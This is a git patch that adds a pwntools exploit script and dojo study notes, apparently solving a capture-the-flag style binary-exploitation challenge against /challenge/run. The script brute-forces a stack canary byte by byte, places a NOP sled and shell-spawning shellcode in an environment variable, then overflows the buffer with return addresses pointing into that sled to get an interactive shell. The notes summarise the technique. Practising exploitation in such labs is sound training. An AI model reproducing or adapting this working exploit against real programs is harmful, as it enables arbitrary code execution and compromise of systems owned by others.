From 7195de9287248b132e2d26b11025dea19b2fc29a Mon Sep 17 00:00:00 2001 From: Kaushik Narayan R Date: Mon, 9 Dec 2024 00:53:23 -0700 Subject: [PATCH] part 4 completed --- 4.44/soln.py | 86 +++++++++++++++++++++++++++++++++++++++++++++++++++ Dojo Notes.md | 7 +++++ 2 files changed, 93 insertions(+) create mode 100644 4.44/soln.py diff --git a/4.44/soln.py b/4.44/soln.py new file mode 100644 index 0000000..e644240 --- /dev/null +++ b/4.44/soln.py @@ -0,0 +1,86 @@ +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- +# This exploit template was generated via: +# $ pwn template /challenge/run +from pwn import * + +# Set up pwntools for the correct architecture +exe = context.binary = ELF(args.EXE or '/challenge/run') + +# Many built-in settings can be controlled on the command-line and show up +# in "args". For example, to dump all data sent/received, and disable ASLR +# for all created processes... +# ./exploit.py DEBUG NOASLR + + + +def start(argv=[], *a, **kw): + '''Start the exploit against the target.''' + if args.GDB: + return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw) + else: + return process([exe.path] + argv, *a, **kw) + +# Specify your GDB script here for debugging +# GDB will be launched if the exploit is run via e.g. +# ./exploit.py GDB +gdbscript = ''' +tbreak main +continue +'''.format(**locals()) + +#=========================================================== +# EXPLOIT GOES HERE +#=========================================================== +# Arch: amd64-64-little +# RELRO: No RELRO +# Stack: No canary found +# NX: NX unknown - GNU_STACK missing +# PIE: No PIE (0x400000) +# Stack: Executable +# RWX: Has RWX segments + +# canary = b"" +canary = b"OiPe7C92" +# canary_found = False +canary_found = True +io = None + +while not canary_found and len(canary) != 8: # unsigned long long -> 8 bytes + for byte in range(256): # byte value range + io = start() + io.send(b"A" * 256 + canary + bytes([byte])) + output = io.clean() # flush output + if b"\nHacking" not in output: + canary += bytes([byte]) + print("updated canary:",canary) + break + io.close() + +print("final canary",canary) + +sled_len = 0x2000 +nop_sled = b"\x90" * sled_len + +shellcode = asm(shellcraft.sh()) + +payload = nop_sled + shellcode + +io = start(env={"SHELLCODE_CMD": payload}) + +io.recvuntil(b"for you: ") +rsp_line = io.recvline()[:-1] +rsp_hex = int(rsp_line, 16) +print("Received rsp address:", rsp_line) + +target_shellcode_sled = p64(rsp_hex + sled_len) + +final_payload = ( + target_shellcode_sled * 0x20 # 256 bytes + + canary # 8 bytes + + target_shellcode_sled * 0x8 # 64 bytes +) +print(len(final_payload)) + +io.send(final_payload) +io.interactive() diff --git a/Dojo Notes.md b/Dojo Notes.md index c6a1c3d..2685a9f 100644 --- a/Dojo Notes.md +++ b/Dojo Notes.md @@ -749,3 +749,10 @@ payload = input_str + padding + input_str_hash - stack pivot + shellcode - can't overwrite saved rip but can overwrite rbp - use it to repeatedly pop into rsp when leaving, thus making it reach the shellcode + +### .44 - working in a coal mine + +- stack canary, but set to static value lol +- bruteforce to get canary +- buffer overflow, but again too small, so have to go for env var +- also similar stack pivot as we can't directly overwrite saved rip